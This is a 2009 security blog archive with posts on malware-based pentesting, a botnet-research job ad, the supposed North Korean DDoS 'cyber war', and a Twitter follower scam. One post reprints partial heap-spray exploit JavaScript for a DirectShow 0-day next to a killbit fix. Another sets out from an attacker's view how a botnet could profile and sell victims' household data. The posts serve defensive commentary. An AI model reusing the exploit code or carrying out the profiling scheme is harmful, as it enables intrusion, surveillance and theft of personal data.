Sunday, July 19, 2009

Pentest Evolution: Malware Under Control

When I look back at the history of commercial consultancy-based pentesting I see two distinct forks in the road. The first happened around 2000, and the second happened around 2003. But I think another fork is about to crop up.

Prior to 2000, commercial pentesting was almost exclusively focused on the external hacking of an organizations Internet visible assets. Basically, professional full-time consulting teams (which can probably be tracked back to 1994 if you push hard enough) were following a loose pentest methodology (still mostly portrayed as a dark art and only "learnable" via an authoritative mentor) - plugging away with vulnerability scanners and exploiting anything that came up - where the goal was break in, plant a few flags, and then tell the client what patches and system hardening they needed to catch up on. This core area of pentesting (which is still a distinct suit of offerings and consulting skills today) focuses upon OS and network-level vulnerability discovery and careful exploitation.

The first fork
By 2000 though, simply hacking an IIS or Apache server through an unpatched vulnerability or permissions flaw and throwing up a command script to "root" the server wasn't really cutting it to anymore for all these new Web applications. So, the first real "specialist" services started appear - focused upon assessing the custom Web application itself - independent of the hosting platform. To my mind, that was the first forking of the pentest track. Sure, there were still (and are) security code reviews (dissecting lines of code and hunting for bugs and vulnerabilities) - but I don't class that as "pentesting" as such, thats either auditing or security assessment.

That first fork led to entirely new pentesting methodologies, training regimes and certifications. But, more importantly, it also led to distinct consulting teams - rather than a specialized subset of network skills learned as part of being a pentester. Today, there's so much to learn in the field of Web Application pentesting that to keep at the top of the game you'll never realistically have time to deep-dive more classical OS and network based pentesting.

The second fork
The next fork that altered the fundamentals of pentesting occurred around 2003 with the advent (and requirement) for specialized reverse engineering skills to "black-box" hack a brand-new commercial software product. Around this time major software vendors were struggling in their battles against blackhat hackers and the full disclosure movement - even the news media was keeping count of the vulnerabilities - and customers were scared.

The solution came from specialist pentesting consulting organizations that had established a name (and reputation) based upon their ability to discover/disclose new vulnerabilities. It was a simple business model - find new bugs in all the software that prospective customers use, tell the media you found some bugs, get recognized by prospective customers as being "elite" pentesters, and turn the "prospective" in to "loyal" customers.

I identify 2003 as the year that specialized bug-hunting and security reverse engineering services started to appear as commercial consulting offerings, and the first real wide-spread traction as software vendors began to procure this specialized consulting.

The skill-sets are (again) quite unique of any other arm of pentesting. While knowledge of the other two pentesting regimes is valuable (e.g. Network/OS pentesting and Web Application pentesting), it takes a different mind and training to excel in the area of security reverse engineering. While you could argue that some of the best "classical" pentesters had many of the skills to find and exploit any new bugs that stumbled across during a client engagement - it wasn't until 2003 that these services really became commercial offerings and sales teams started to sell them.

The impending fork?
Which all leads me to point out a probable new folk in the pentesting path - specialist malware and its employment in pentesting. Why?

It seems to me that we've reached a time where formalized methodologies and compliance mandates have pretty much defined the practical bounds of commercial pentesting (Network/OS, Web application and Reverse Engineering), and yet there is a sizable security gap. And that gap firmly lies within the "prove it" camp of pentesting.

What I mean by that is, as any savvy pentester will tell their customer, the pentest is only as good as the consultant and the tools they used, and is only valid for the configuration tested and the date/time of testing. No guarantees or warranties are inferred, and it's a point in time test. And, on top of all that the scope of the pentest has typically been narrowly defined - which means that you end up with phrases like "system was out of scope...", "...not all patches were applied", "...not allowed to install tools on the compromised host", etc., appearing in the final reports handed to the customer.

But, with the greater adoption/deployment (and availability) of technologies such as IPS, firewalls, ADS, Web filtering, mail gateways, host-based protection, DLP, NAC, etc. and the growing strictness (and relevance) of compliance regulations, those classic limitations of pentesting methodologies leave vacant the "prove it" - prove that those technologies are really working and that the formal emergency response systems really do work.

This is where I think a new skill set, mindset and pentesting methodology is developing - and is an area which I expect to see develop in to commercial offerings this year.

Pentesting with malware
What I envision is the requirement for specialised security pentesting offerings that focus upon developing new "malware" and "delivery systems" designed to not only test the perimeter defenses of an enterprise, but also every layer of their security system in one go.

I don't think it's enough to say "drive-by-downloads are a fact of life and all it takes is one unpatched host to browse a dangerous site to infect our network. but that's OK because we have anomaly detection systems and DLP, and we'll stop them that way". Prove it!

Given the widespread availability of DIY malware creation kits, and the staggering array of tools that can pack, crypt, armour, obfuscate and bind a custom malware sample - and make it completely invisible to any anti-virus technology deployed within an enterprise - I expect that there will be a demand for pentesting to evolve and encompass the use of "live" malware as a core pentest consultancy offering.

For example, does the customers enterprise prevent users from browsing key-munged web sites (e.g.,, etc.)? Which browser plugings are installed and not fully patched? Can malicious URL's and zipped malware make it through the mail gateways? Can the host-based security package detect keyloggers and network sniffers? If a malware package starts to scan and enumerate the local network from an "infected" host, is it detected, and how fast? What types of data can be exported from an infected host? Does compression and encryption of exported data get detected by the DLP solution? Does the malware have to be "proxy-aware" and require user authentication? Is out-of-hours activity detected from an "infected" host? Is it possible to "worm" through the enterprise network and "infect" or enumerate shared file systems and servers?

All of these questions, and many more, can be answered through the deployment of specialized malware creations and focused delivery techniques. The problem though is that this is an untapped fork in the pentesting road, requiring new mindsets - particularly with enterpise security teams.

The bad guys are already exploiting enterprises with custom malware, yet its generally taboo for consultancies to test security using similar methods. To my mind, that means that new pentesting specialization is now required to deliver the expertiese needed by enterprise business to really test their security from today's threat spectrum.

Malware pentest anyone?

Monday, July 13, 2009

Senior Research Analyst Role(s) Now Available

Just a quick note to say that I've got a couple of open security jobs going for Senior Research Analysts over at Damballa. I'm looking for a couple of folks that like living on the cutting-edge of security.

You can submit your resume on the company portal HERE if you're interested in getting elbow-deep with botnets.

Below is the job description...

Job Specification: "Senior Research Analyst"
Internet security is evolving at an increasingly rapid pace. As the thrust and parry of attack vectors and defensive tactics force technologies to advance, the biggest security threat now facing enterprise organizations lies with botnets. The Damballa Research team spearheads global threat research and botnet detection innovation.

Damballa’s dedicated research team is responsible for botnet threat analysis and detection innovation. From our Internet observation portals, and using the latest investigative technologies to intercept and capture samples, the research team studies the techniques employed by criminal botnet operators to command and control their zombie hordes – mapping their spread and evolution – and developing new technologies to both detect and thwart the threat.

As a Senior Research Analyst you would be part of the team responsible for providing the threat knowledge that powers the core technologies of Damballa’s products – working on advanced pattern detection algorithms, massive data collection and analysis solutions, prototyping new detection systems, and advancing large-scale applications that deliver actionable threat intelligence.

The rapid evolution of the threat means that, as a Senior Research Analyst, you will also need to be able to deep-dive in to the botnet masters lair – turning over the rocks they hide under and visiting the online portals they do their business in – and be capable of analyzing the evidence of their passing. A key to being successful in this role is the ability to provide internal departments with comprehensive intelligence on malicious software (malware) behavior as it pertains to Botnets and other targeted threats – and to be able to communicate the threat in a clear and concise manner.

Collaborating with the marketing and engineering teams, the Senior Research Analyst will typically need to design and construct analysis tools that automate the extraction of botnet intelligence and make it available to the company’s other technologies and its knowledgebase as well as responding to ad-hoc requests for malware analysis driven by business and client needs to determine characteristics, functionality, and/or recommend countermeasures.

The position may entail interaction with the media following the successful outcome of directed research or response activities.

  • Independent threat analysis and data mining of new botnet instances
  • Research in to new methods for detecting and reporting botnet activities
  • Dissection of new botnet samples and the automation of sample processing
  • Investigation of new botnet command and control tactics and subsequent enumeration of botnet operators
  • Focused analysis of botnet outbreaks within enterprise and ISP networks
  • Contribution to research and commercial papers describing the evolving botnet threat
Skills & Experience:
  • Experience as a security engineer, threat intelligence analyst, or similar senior technical role
  • Extensive knowledge of tracing and debugging Windows processes in the context of malware reverse engineering
  • Proficiency with C/C++ programming and x86 assembly /disassembly
  • Deep understanding of network flow data analysis , deep packet inspection and network behaviors of malicious software
  • Comprehensive knowledge of anti-debugging and anti-instrumentation techniques
  • Familiarity with packing and anti-reverse engineering techniques, including data obfuscations that employ primitive or basic cryptography
  • Ability to troll underground Internet forums and criminal sites/portals for new botnet intelligence
  • BS or MS in Computer Science or equivalent industry experience
  • Good understanding of TCP/IP networking and security
  • Proficient in multiple compiled and scripting languages (Perl, Python, Ruby, Java, C, etc.)
  • Proficient with Unix (Linux preferred) development and production environment
  • Proficient query design in relational databases (Postgres/pgsql preferred)
  • Excellent formal communication and presentation skills
  • Ability to read and translate multiple international languages a bonus
Note: The roles are ideally based in Atlanta. If you're having trouble with the online form (or need to check to see if your resume arrived safely), you can always try to drop me an email at my work address of 'gollmann-at-damballa-dot-com' - but don't bother to do so if you're an agent or representing someone else (those emails will go straight to the deleted items).

Sunday, July 12, 2009

Root of all Evil Kicks off Cyber War...

It's been a ridiculous week reading the papers about the pitched battle that North Korea has kicked off against the USA and South Korea. Those juggernauts of the internet have supposedly begun a 21st century cyber war... or so some politicians would have you think. Oh, and "we" have to retaliate too.

Nature abhors a vacuum, and it looks like more that a few heads have been filled with cyber-war nonsense.

I blogged on Friday about the topic on the Damballa site (and I've reposted it below), but I forgot to mention much about the DDoS threat angle. In a nutshell, DDoS is a common occurrence across the internet. Major web sites - particularly government and international conglomerates - are constantly under DDoS attacks of some degree or other. Unfortunately it's just a fact of Internet life nowadays - a bit like Spam taking up 80+ percent of email traffic.

What about the major sites that got hit and became unoperational? Unfortunately, this too is an ongoing problem. As the bandwidth to home internet users increase, the number of hijacked connections needed to take out big corporate Internet pipes gets lower and lower. While it's true that the sites under attack can work on mitigation strategies to prevent (or more likely reduce) the outages due to DDoS - they are increasingly reliant upon upstream ISP's to do the real work in preventing the attack. The strength of their relationship, is evident in the speed to responding to DDoS attacks.

Lets face it though - if only 10% of the worlds computers outside of the US decided to initiate a coordinated DDoS attack against any site or organization in the USA, that site will be toast. Volume trumps network security magic.

Reposting -

North Korea Kicks-off DDoS Cyber War?

For all the headlines these last few days you’d have thought cyber-war had kicked off and we’re on the cusp of Armageddon. Depending upon which news channel you’ve been listening to or which newspapers you’ve been skimming you could have hardly missed this latest nonsense that North Korea has instigated a cyber war against the USA and South Korea. Its even got to the point that I’ve had to get on the TV myself and try to explain the situation.

As such, I spent a few minutes this afternoon on CNN International News talking about this supposed North Korean cyber-attacks – trying to correct some of the madness that the conspirators and ill-informed have been spouting.

Here’s a 20 second summary of whats been happening in the news:

  1. On July 4th, a handful of US websites (5) came under DDoS attack from a botnet consisting of a high proportion of bot agents (i.e. victims) based within South Korea.
  2. Initial estimates placed this particular botnet at about 20,000 agents.
  3. Over the following days the list of targeted web sites grew to 26, with a mix of US and South Korean sites.
  4. The targets were a mix of government, financial and news media Web sites – more heavily weighted towards government sites.
  5. The bot agents were launching a mix of HTTP GET requests, UDP packets and ICMP ECHO requests at each listed target – repeatedly cycling through the list in a round-robin fashion. Depending upon the victim computer being used, this could represent around 100 “attacks” per second.
  6. Estimates of the botnet size range from 20k through to 100k – with most public news media estimating the size to be 50-60k bot agents.
  7. Some Web sites didn’t cope well with their unwanted DDoS traffic and went down for a period of time – most noticeable the FTC Web site.
  8. The bot agent in use (and the samples Damballa have collected) are based upon MyDoom – a worm-based bot agent dating back to 2004.

Oh, and the biggie, 9. it seems that a number of politicians have jumped on to this DDoS and portrayed it as the first foray in to cyber-war by North Korea… we’re all doomed… and, since this is an act of war, “we” need to strike back!

So, let me try to inject some sanity in to all this madness and, in my best Scouser accent, shout “calm down, calm down!

While a lot of the analysis is still ongoing – and likely to continue long after the public looses interest – I’ve come to the conclusion that this DDoS attack has very little to do with North Korea and only consipiritory theorists could conclude that this is a state-sponsored kick off to cyber-war. Why not?

  1. The bot agents being used in this attack are ancient. They’re not stealthy, they have limited attack capabilities, they’re detectable by just about every anti-virus product out there (and have been for over half-a-decade), and it makes no sense for any professional to use them – even if they were handed over as a free-be. We’re not even talking about someone taking the cyber-equivalent of arming a few farmers with 40 year-old AK-47’s, it’s more like arming a troupe of girl-scouts with water-balloons and Nerf guns.
  2. The DDoS attacks came from bot victims scattered around the globe – with perhaps the highest concentration in South Korea. As far as I’m aware, there was no noticeable collection of bot agents from North Korea. In fact it even looks like the command and control servers for this botnet weren’t even based in the region – and were most like compromised already.
  3. The list of targets doesn’t make sense. Sure, a handful of the Web sites have some significance from a government perspective – but they’re only Web sites, and nothing special happens there. If you’re going to target a nations infrastructure and do cause any level of pain, “these are not the droids you are looking for”.
  4. The fact that the list grew over multiple days and only leached over to include some South Korean sites latter suggests to me that the “mastermind” behind this attack is more likely to be some crazy South Korean college student who thought it would be cool to strike out at the US – then told some of his mates over the weekend what he was doing – and subsequently ended up following their advice to include some additional sites that would be “cool” to throw sticks at. Then, on the last night, they all grabbed a few beers and decided to chuck in a few local Web sites for good measure since they’re now making the news (”Hi mom!”).
  5. I’d also have to conclude that the botnet operator(s) are amateurs. A DDoS attack is only successful if you throw enough traffic at a targeted Web server to overwhelm it. To take a (relatively) small botnet and to split it’s target range over multiple sites means that the per-target attack volume is going to decrease. To split the target pool amongst 26+ Web sites was going to be a wasted effort – and most likely the operator(s) have little understanding of network security and the protocols they were playing with.
    OK, so I hear you say “but some of the US Web sites went down”… yes they did, but early on in the attack. This means two things to me – (a) later on they targeted more Web sites, so the volume of DDoS traffic to the affected sites dipped after a few days, and (b) the system administrators of those Web sites managed to read the first few chapters of “Network Security for Dummies” and actioned the anti-DDoS advice they were given.
  6. Why South Korea? Let me temporarily slip on my blackhat and explain it from a bad-guys perspective. Why not? I’m hardly going to launch the DDoS from computers I own or from the place I work. South Korea is known to have a top-notch Internet infrastructure – with most of the population having high-speed Internet access (higher on average that the US) – yet it’s online population typically has one of the highest infection rates of anywhere in the world. So it’s a great place to build a high-speed botnet from scratch.

OK, so for all those reasons above, I don’t think that this is a North Korean cyber-war. And I also don’t think that North Korean sympathisers have infiltrated South Korea and are masking their attack from within – as suggested by a handful of politicians (wasn’t that some Tom Clancy plot?).

My advice for those politicians and conspiracy pundits out there thinking that cyber-war is upon us by the evil North Koreans – think again. Even if you’re right and this is a state-sponsored attack, then by the nature of the attack exhibited thus far you might as well invest in some umbrellas to avoid the water balloons – rather than consider retaliatory cyber attacks.

Note: I thought the image of Worzel Gummidge was appropriate for this blog. For those unfamiliar with this 1979 TV series – it stared Jon Pertwee of Dr Who fame and his scarecrow character had to change his head whenever he needed to do some thinking…

Monday, July 6, 2009

New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the killbit for it.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;


var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;


shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
var myObject=document.createElement('object');


Sunday, July 5, 2009

Making Money with Your Own Stealthy Botnet - Part III

So, how can you use a stealthy botnet and milk your victims for all their worth with the least likelihood of being detected? I've already discussed the vectors of modifying advertising in real-time and pay-per-installs, but what happens if you get more personal?

Sure, we've seen lots of FUD about identity theft and the roll botnets play propagating that threat. The problem with a lot of these "legacy" attacks is that they get noticed pretty quick and, more importantly, banks and financial institutes have become much better at automatically detecting the money-transfer part of the fraud/theft. Bot-masters embarking down this fraud path have little imagination or grasp of the value of all the other information they could be potentially tapping on each victim host.

If I had a botnet of 50,000 victims and was contemplating a life of crime, an interesting and stealthy route to make money could lie in household profiling.

3. Household Profiling
Consider for a moment the value of an identity. For the last five years the financial/tradeable value of an "identity" has been on the decrease. For example, an "identity" (consisting of name, address, phone number, birth-date, credit card number, card expiry, CCV code and Social Security Number) can be picked up for as little as $0.20 in batches of a thousand, but can rise to as much as $100 if it also includes the victims online banking credentials.

The problem though is that as soon as the accounts are tapped, the probability of the victim knowing, getting new credit cards, changing online banking details AND having the transaction voided, is practically guaranteed - and there is a high likelihood that the victim will hunt out bot agents on their host - not to mention being hunted down by law enforcement.

So, instead of focusing on this "short gain" fraud, why not embrace the long term - building up a complete profile of the user/family. Most of this concept could be categorized as "spyware", but there could be some tweaks to make it more profitable to the botnet operator.

Lets look some of the information that I think could be extracted from a family PC infected with a botnet agent capable of keylogging, screen-grabbing, man-in-the-browser, file scanning and encrypted C&C (which is basically every bot agent out there today...):
  1. Household Financial. Does the family have money to spend, and how do they manage their money? Every time a family member logs in to their online banking portal or receives an email, you could grab financial information such as:
    * Houshold monthly income
    * Total cash savings
    * Monthly spending patterns
    * Long-term savings and retirement plans
    * Stock-holdings and investment profile
  2. Bill Payments. Who supplies the household and how much are they spending? Monitoring online portals and scanning emails (or even VoIP traffic) it would be possible to uncover marketable profile information such as:
    * How much are they spending on utility bills?
    * Which stores do they regularly visit, what do they actually buy, and how much do they spend?
    * Are they up on their payments or behind?
    * Are they and the family in good health? Are they planning/saving for a major operation?
  3. Web Profiling. That holy grail proposed throughout the 1990's of building up a full profile of the family my monitoring their network traffic? Well it's all possible - but this time not inhibited by bothersome laws. Saleable information such as the following could be extracted:
    * Which sites do they visit, and how long to they spend on them?
    * What are they searching for or likely to purchase shortly?
    * What do their children and grand-parents do? How old are they?
  4. Contact Extraction. By scanning through mailboxes (both locally stored and webmail) along with social networks, gaming and other portals, the bot agent could extract detailed contact information - which in turn can be used for profiling (or infecting) friends.
  5. Affiliations. The monitoring of web traffic and emails will likely also reveal less tangible affiliation information such as religion and social groups.
Now, imagine you can automatically extract, group and sort this information from 50,000 hosts (which for the sake of arguments could encompass maybe 40,000 family units and a total of 100,000 personal identities) - how would you make money from it?

Several methods spring to mind:
  • Gray-channel marketing portals. Much of this personal information can be "washed" through the gray-market and be absorbed through a second-tier of marketing channels. While each record subset of information probably doesn't have much value by itself - probably only $0.50-2.00 per record and maybe $1-5 per family - it does have the advantage of being sold to multiple institutions as well as being offered as a "subscription" service. With that in mind, you'd probably be looking at earning something like $200+ per year (less expenses).
  • Targeted Profiled Sales. I've been told many times that it costs somewhere between $50-$200 to attract a new customer and entice them to move to a new utility/service provider. It would be relatively easy to provide profiles of households based upon existing utilities (and what their monthly bills are - along with history of payments) and sell them to competitors. I wouldn't be surprised if you could make $10-20 per "package" - and could net something in the region of $20k per month - by selling that info to commission-based utility sales reps. Sure, that's probably illegal and wouldn't be condoned by the Utility companies themselves, but I suspect quota-based sales would be a reliable vector. With that in mind, perhaps chopping out the middle-man and getting a job as the Utility sales rep directly may be more financially viable.
  • Just-in-time-sales. With sufficient effort, you could probably automate the identification of impending sales events. For example, the lease on the family car has just ended and they're now browsing the web for a 4-door convertible - or perhaps the family are just about to begin planning their summer/winter vacations. Extracting this information, passing it to a local dealer and taking a slice of the eventual sale price would be simple enough. It's probably not high value, but it is low risk.
  • Bulk Contact Sales. If all else fails, there's an existing market for email addresses and other bulk contact details. This type of info is trivial extract and its source can be easily obfuscated. However, even with 50,000 bots (potentially yielding 1-2m contacts), you're probably only going to make a few thousand dollars per year.
All in all, I think you could maintain a healthy revenue stream from simple household profiling with a relatively low threshold of being detected (and subsequently being thrown in jail). Out of all the botnet revenue models discussed thus far this one would probably be most preferable... so far...

Thursday, July 2, 2009

Take the Twitter Train to Despair and Spamvertizing

I've been watching with interest this "twitter train" phenomenon. Scam of the week...

In a nutshell, a number of websites have been set up under the guise of "twitter train" whereby low-esteem twitter addicts can potentially add hundreds of new followers.

From the website(s):
"Twitter Train is the only place to expand your Twitter followers. Its FREE to join so you have nothing to loose by giving it a go.

When you login you will be taken to a screen with other Twitter users, on here you follow the members and then get added to the front of the train for the next 40 visitors to follow.

Remember VIP members get tons more followers because they stay on the train all day, so make sure you become a VIP member."

Whoah... so to use this follower-building service I have to give them my Twitter authentication details? Oh, and then there's:

"We may use your account to promote our services, with the exception of VIP account."

It's a kind of hybrid pyramid scheme meets password stealer that'll spew out spamvertizing? Are they crazy? Perhaps not. Looking at a couple of different sites ( and -- since has been shutdown) you'll see numbers like 3,373,486 and 2,966,814 respectively being depicted as "Total Follows" with close to a combined 1,700,000 VIP follows (i.e. paid-for accounts). There's no guarantee that these numbers are anything real (and I suspect that they aren't) but thats a huge number of potentially stolen/hijacked accounts.

For those suckers (and soon to be victims?) seeking to build up their social cred by dramatically adding followers, do you really know what you're getting in to? I hope you don't use the same password on sites beyond Twitter!

An old saying goes..."A fool and his money are easily parted." In this case a fool, his money, his password and his dignity are easily parted.

Don't say you weren't warned. And don't be suprised if you're un-followed as soon as your account starts spewing tweet-spam. Better change your Twitter password before twitter-train does it for you ;-?